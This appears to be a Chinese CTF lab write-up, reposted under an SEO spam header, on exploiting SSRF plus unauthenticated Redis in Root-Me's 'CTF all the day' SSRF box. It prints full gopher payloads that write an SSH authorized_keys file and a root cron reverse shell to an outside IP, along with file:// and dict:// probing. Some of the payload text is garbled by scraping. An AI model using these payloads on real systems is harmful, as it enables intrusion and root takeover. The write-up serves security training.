东莞搜索seo网站关键词优化网站建设排版规定

当前位置： 首页 > news >正文

东莞搜索seo网站关键词优化,网站建设排版规定,开一个公司需要多少钱,o2o网站建设最好公司Rootme CTF all the day靶场ssrfredis漏洞 一、环境介绍1、漏洞地址2、漏洞介绍 二、 搭建环境三、测试过程3.1 读取系统文件3.2 探测开放的服务器端口(dict协议)3.3 redis未授权访问3.3.1 利用redis来写ssh密钥#xff08;gopher协议写入#xff09;3.3.2 利用redis写定时任… Rootme CTF all the day靶场ssrfredis漏洞 一、环境介绍1、漏洞地址2、漏洞介绍 二、 搭建环境三、测试过程3.1 读取系统文件3.2 探测开放的服务器端口(dict协议)3.3 redis未授权访问3.3.1 利用redis来写ssh密钥gopher协议写入3.3.2 利用redis写定时任务来反弹shellgopher协议写入 一、环境介绍 1、漏洞地址 https://www.root-me.org/en/Capture-The-Flag/CTF-all-the-day/ 2、漏洞介绍 SSRFredis 获取内网主机权限利用SSRF来对redis的未授权访问执行命令。从而达到获取主机权限的目的 二、 搭建环境 首先需要创建账号点击右上的绿色小加号来创建账号创建完成后回到此页面。找到一个处于none的虚拟机点击房间名如下的ctf12 然后进入之后选择需要创建的虚拟机选择SSRF Box点击保存选择start the game。选择完成之后需要加载等待一会然后访问 ctf12.root-me.org 就可以看到启动的虚拟环境了如下图
三、测试过程 访问ctf12.root-me.org 在页面的输入框中输入百度地址后会把百度首页加载进来。
3.1 读取系统文件 1、可以在输入框中随便输一个url抓包然后把包发送到Repeater模块把url后面的内容修改为 file://…/…/…/etc/passwd来读取该文件
3.2 探测开放的服务器端口(dict协议) dict协议一般常用来探测内网主机以及端口开放情况既然能够探测端口那么可以探测不同端口对应的服务的指纹信息。当然dict协议也可以用来执行一些服务的命令 注意dict执行命令多行操作的命令时只能一次执行单行需分多次执行。 首先将包发送到Intruder模块爆破端口端口开放显示为OK没有开放显示为Connection refused。 这里我们已经知道是6379端口了所以为了不浪费时间区间就设置为6000-7000 端口没有开放显示如下图 端口开放显示如下图 发现6379端口判断redis服务有无身份验证发现redis存在未授权访问 3.3 redis未授权访问 3.3.1 利用redis来写ssh密钥gopher协议写入 此处利用ssh生成一对公私钥生成的默认文件为id_rsa.pub和id_rsa。把idrsa.pub上传至服务器即可。我们利用redis把目录设置为ssh目录下根据网上写密钥有两种协议可以使用一种是dict一种是gopher。测试使用dict协议写不成功写入后不能连接此处使用gopher写密钥。 原始payload为 gopher://127.0.0.1:6379/*3%0d%0a\(3%0d%0aset%0d%0a\)1%0d%0a1%0d%0a\(576%0d%0a%0a%0a%0assh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHSdAmmBYRnUrfOOO0N0Y/fKCLHEqt8aoc3pQPfAKStDL12rlPlf0nmkzQmPcHoHBKW6AEqb2QXWiB2TQFJTBdMXThHdZe4RzN5pLPPlqUg6dZZQhIT0/LaPOIyRRVRld8vwDw1bNpWcnlNPxf77LS9yJxQZzub6o7OWL/w2xWLexSQAYUQ9mflz4qluV/M4iVRuZ3FNzqDWgeIziDCUaJydBpO1cisMj9TWkXCmGaj5hl1WsrffaIjsdHO6wbrZIERGh/3HDpwXlsVXc2m9Nyxalh4qeGFVG/Fso7APhVcAfhA3lkNOTwySksss6JE2ic3slvIO2zXj1wI/IHMPXNb2nhnVWWRSDp9OAcDxdLTJK0k2pVlq2yi/dWUjrcZBP3LV9pnb5ASrKmhBzxkqSPnrBhyp55qawKW2rnCeHSg9gMt/OBlMKrGnroZjw9scuie5OxDy/7Vvr7l8vq2IbzBoWEd5d4dxCDpmtXZS/yEnIo5Y9IIQJNuOvs rootmk50%0a%0a%0a%0a%0d%0a*4%0d%0a\)6%0d%0aconfig%0d%0a\(3%0d%0aset%0d%0a\)3%0d%0adir%0d%0a\(11%0d%0a/root/.ssh/%0d%0a*4%0d%0a\)6%0d%0aconfig%0d%0a\(3%0d%0aset%0d%0a\)10%0d%0adbfilename%0d%0a\(15%0d%0aauthorized_keys%0d%0a*1%0d%0a\)4%0d%0asave%0d%0a*1%0d%0a\(4%0d%0aquit%0d%0a原始内容为 gopher://127.0.0.1:6379/_*3 \)3 set \(1 1 \)576ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHSdAmmBYRnUrfOOO0N0Y/fKCLHEqt8aoc3pQPfAKStDL12rlPlf0nmkzQmPcHoHBKW6AEqb2QXWiB2TQFJTBdMXThHdZe4RzN5pLPPlqUg6dZZQhIT0/LaPOIyRRVRld8vwDw1bNpWcnlNPxf77LS9yJxQZzub6o7OWL/w2xWLexSQAYUQ9mflz4qluV/M4iVRuZ3FNzqDWgeIziDCUaJydBpO1cisMj9TWkXCmGaj5hl1WsrffaIjsdHO6wbrZIERGh/3HDpwXlsVXc2m9Nyxalh4qeGFVG/Fso7APhVcAfhA3lkNOTwySksss6JE2ic3slvIO2zXj1wI/IHMPXNb2nhnVWWRSDp9OAcDxdLTJK0k2pVlq2yi/dWUjrcZBP3LV9pnb5ASrKmhBzxkqSPnrBhyp55qawKW2rnCeHSg9gMt/OBlMKrGnroZjw9scuie5OxDy/7Vvr7l8vq2IbzBoWEd5d4dxCDpmtXZS/yEnIo5Y9IIQJNuOvs rootmk50*4 \(6 config \)3 set \(3 dir \)11 /root/.ssh/ *4 \(6 config \)3 set \(10 dbfilename \)15 authorizedkeys *1 \(4 save *1 \)4 quit进行写入操作对*3%0d%0a\(3%0d%0aset%0d%0a\)1%0d%0a1%0d%0a\(576%0d%0a%0a%0a%0assh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHSdAmmBYRnUrfOOO0N0Y/fKCLHEqt8aoc3pQPfAKStDL12rlPlf0nmkzQmPcHoHBKW6AEqb2QXWiB2TQFJTBdMXThHdZe4RzN5pLPPlqUg6dZZQhIT0/LaPOIyRRVRld8vwDw1bNpWcnlNPxf77LS9yJxQZzub6o7OWL/w2xWLexSQAYUQ9mflz4qluV/M4iVRuZ3FNzqDWgeIziDCUaJydBpO1cisMj9TWkXCmGaj5hl1WsrffaIjsdHO6wbrZIERGh/3HDpwXlsVXc2m9Nyxalh4qeGFVG/Fso7APhVcAfhA3lkNOTwySksss6JE2ic3slvIO2zXj1wI/IHMPXNb2nhnVWWRSDp9OAcDxdLTJK0k2pVlq2yi/dWUjrcZBP3LV9pnb5ASrKmhBzxkqSPnrBhyp55qawKW2rnCeHSg9gMt/OBlMKrGnroZjw9scuie5OxDy/7Vvr7l8vq2IbzBoWEd5d4dxCDpmtXZS/yEnIo5Y9IIQJNuOvs rootmk50%0a%0a%0a%0a%0d%0a*4%0d%0a\)6%0d%0aconfig%0d%0a\(3%0d%0aset%0d%0a\)3%0d%0adir%0d%0a\(11%0d%0a/root/.ssh/%0d%0a*4%0d%0a\)6%0d%0aconfig%0d%0a\(3%0d%0aset%0d%0a\)10%0d%0adbfilename%0d%0a\(15%0d%0aauthorized_keys%0d%0a*1%0d%0a\)4%0d%0asave%0d%0a*1%0d%0a\(4%0d%0aquit%0d%0a这部分url编码方可成功 编码后playload: gopher://127.0.0.1:6379/_*3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%24576%250d%250a%250a%250a%250assh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABgQDHSdAmmBYRnUrfOOO0N0Y%2ffKCLHEqt8aoc3pQPfAKStDL12rlPlf0nmkzQmPcHoHBKW6AEqb2QXWiB2TQFJTBdMXThHdZe4RzN5pLPPlqUg6dZZQhIT0%2fLa%2bPOIyRRVRld%2b8vwDw1bNpWcnlNPxf77LS9yJxQZzub6o7OWL%2fw2xWLexSQAYUQ9mflz4qluV%2b%2fM4iVRuZ3FNzqDWgeIziDCUaJydBpO1cisMj9TWkXCmGaj5hl1WsrffaIjsdHO6wbrZIERGh%2f3HDpwXlsVXc2%2bm9Nyxalh4qeGFVG%2fFso7APhVcAfhA3lkNOTwySk%2bsss6JE2ic3slvIO2zXj1wI%2fIHMPXNb2nhnVW%2bWRSDp9OAcDxdLTJK0k2pVlq2yi%2fdWUjrcZBP3LV9pnb5ASrKmhBzxkqSPnrBhyp55qawKW2rnCeHSg9gMt%2fOBlMKrGnroZj%2bw9scuie5OxDy%2f7Vvr7l8vq2IbzBoWEd5d4dxCDpmtXZS%2fyEnIo5Y9IIQJNuOvs%3droot%40mk50%250a%250a%250a%250a%250d%250a*4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2411%250d%250a%2froot%2f.ssh%2f%250d%250a*4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%2415%250d%250aauthorized_keys%250d%250a*1%250d%250a%244%250d%250asave%250d%250a*1%250d%250a%244%250d%250aquit%250d%250a查看是否写入的成功 可以看到成功写入公钥 然后就可以使用vps进行ssh登录到目标机器上 ssh -i /root/.ssh/id_rsa rootip3.3.2 利用redis写定时任务来反弹shellgopher协议写入 要用到一台外网主机然后使用nc做端口监听。 原始payload gopher://127.0.0.1:6379/_*3%0d%0a\)3%0d%0aset%0d%0a\(1%0d%0a1%0d%0a\)61%0d%0a%0a%0a%0a*/1 * * * * bash -i /dev/tcp/外网IP/8888 01%0a%0a%0a%0a%0d%0a*4%0d%0a\(6%0d%0aconfig%0d%0a\)3%0d%0aset%0d%0a\(3%0d%0adir%0d%0a\)16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a\(6%0d%0aconfig%0d%0a\)3%0d%0aset%0d%0a\(10%0d%0adbfilename%0d%0a\)4%0d%0aroot%0d%0a*1%0d%0a\(4%0d%0asave%0d%0a*1%0d%0a\)4%0d%0aquit%0d%0a原始内容为 3 \(3 set \)3 ttt $69/1 * * * * bash -i /dev/tcp/外网IP/8888 01*4 \(6 config \)3 set \(3 dir \)16 /var/spool/cron/ *4 \(6 config \)3 set \(10 dbfilename \)4 root *1 \(4 save *1 \)4 quit进行写入操作发现没有写入成功。原因在于curl_exec()造成的SSRFgopher协议需要使用二次URLEncode;而file_getcontents()造成的SSRFgopher协议就不用进行二次URLEncode 对3%0d%0a\(3%0d%0aset%0d%0a\)1%0d%0a1%0d%0a$61%0d%0a%0a%0a%0a/1 * * * * bash -i /dev/tcp/外网IP/8888 01%0a%0a%0a%0a%0d%0a*4%0d%0a\(6%0d%0aconfig%0d%0a\)3%0d%0aset%0d%0a\(3%0d%0adir%0d%0a\)16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a\(6%0d%0aconfig%0d%0a\)3%0d%0aset%0d%0a\(10%0d%0adbfilename%0d%0a\)4%0d%0aroot%0d%0a*1%0d%0a\(4%0d%0asave%0d%0a*1%0d%0a\)4%0d%0aquit%0d%0a这部分进行url编码后进行发包可以成功看到4个ok说明四条语句均执行成功 url编码后playload为 gopher://127.0.0.1:6379/_3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2461%250d%250a%250a%250a%250a%2f1****bash-i%3e%26%2fdev%2ftcp%2f192.168.182.131%2f88880%3e%261%250a%250a%250a%250a%250d%250a*4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2fvar%2fspool%2fcron%2f%250d%250a*4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a*1%250d%250a%244%250d%250asave%250d%250a*1%250d%250a%244%250d%250aquit%250d%250a等待1分钟Vps成功接收到回连的shell这里我的可能出了问题借用大佬的图片 查看写入的key 可以看到确实成功写入到了redis中但就是我的vps连不上。 到此结束